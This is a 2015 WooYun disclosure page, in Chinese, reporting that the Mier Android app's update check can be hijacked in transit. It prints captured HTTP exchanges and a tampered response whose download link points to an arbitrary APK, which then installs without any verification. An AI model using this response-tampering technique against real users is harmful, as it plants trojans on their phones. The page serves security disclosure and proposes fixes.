当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148285

漏洞标题:米尔客户端APP升级过程存在缺陷可被中间人攻击利用植入木马

相关厂商:米尔网

漏洞作者: 路人甲

提交时间:2015-10-21 11:49

修复时间:2016-01-24 11:50

公开时间:2016-01-24 11:50

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-24: 细节向公众公开

简要描述:

米尔安卓APP客户端在升级过程中,校验过程不严格,可以导致被中间人利用,劫持安装任意应用

详细说明:


使用fildder,抓包,修改返回数据包中的url地址,即可对app客户端升级进行劫持,
任意安装应用
点击客户端,检测最新版本
正常客户端发包和服务端返回数据如下

GET http://**.**.**.**/api/2.0.3/upgrade.php?plat=android&proct=mierapp&versioncode=20150807&apiCode=4 HTTP/1.1
Content-Length: 0
Host: **.**.**.**
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; SM-G900F Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip


正常的服务端返回数据包如下

HTTP/1.1 200 OK
Server: M_cdn
Date: Wed, 21 Oct 2015 02:56:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.12
Content-Length: 335
{"versionCode": "20150804","versionName": "2.2.3","downloadUrl":
"http://**.**.**.**/download/2.2.3/miercn_upgrade.apk","updateLog": "1.社区全新改版,增加网友实时动态\n2.修复了启动软件偶尔闪退的问题\n3.修复了自动登陆延迟的问题\n4.减少了移动网络的流量损耗\n5.新增视频栏目"}


12.gif


修改数据包中url为**.**.**.**/app/xrt-v1.0.apk,版本大于当前版本2.2.3即可

HTTP/1.1 200 OK
Server: M_cdn
Date: Wed, 21 Oct 2015 02:47:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.12
Content-Length: 320
{"versionCode": "20151004","versionName": "2.2.5","downloadUrl":
"**.**.**.**/app/xrt-v1.0.apk","updateLog": "1.社区全新改版,增加网友实时动态\n2.修复了启动软件偶尔闪退的问题\n3.修复了自动登陆延迟的问题\n4.减少了移动网络的流量损耗\n5.新增视频栏目"}


13.gif


下载后,无校验,即可安装该apk

14.gif


漏洞证明:


使用fildder,抓包,修改返回数据包中的url地址,即可对app客户端升级进行劫持,
任意安装应用
点击客户端,检测最新版本
正常客户端发包和服务端返回数据如下

GET http://**.**.**.**/api/2.0.3/upgrade.php?plat=android&proct=mierapp&versioncode=20150807&apiCode=4 HTTP/1.1
Content-Length: 0
Host: **.**.**.**
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; SM-G900F Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip


正常的服务端返回数据包如下

HTTP/1.1 200 OK
Server: M_cdn
Date: Wed, 21 Oct 2015 02:56:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.12
Content-Length: 335
{"versionCode": "20150804","versionName": "2.2.3","downloadUrl":
"http://**.**.**.**/download/2.2.3/miercn_upgrade.apk","updateLog": "1.社区全新改版,增加网友实时动态\n2.修复了启动软件偶尔闪退的问题\n3.修复了自动登陆延迟的问题\n4.减少了移动网络的流量损耗\n5.新增视频栏目"}


12.gif


修改数据包中url为**.**.**.**/app/xrt-v1.0.apk,版本大于当前版本2.2.3即可

HTTP/1.1 200 OK
Server: M_cdn
Date: Wed, 21 Oct 2015 02:47:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.12
Content-Length: 320
{"versionCode": "20151004","versionName": "2.2.5","downloadUrl":
"**.**.**.**/app/xrt-v1.0.apk","updateLog": "1.社区全新改版,增加网友实时动态\n2.修复了启动软件偶尔闪退的问题\n3.修复了自动登陆延迟的问题\n4.减少了移动网络的流量损耗\n5.新增视频栏目"}


13.gif


下载后,无校验,即可安装该apk

14.gif


用户看到的界面是正常的,点击确定后,该apk就会安装
如果恶意攻击者生成一个同图标同名的木马应用,一般用户会
不加思索的安装然后手机被攻击者控制

修复方案:

1、修改升级协议
2、校验升级文件

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-24 11:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价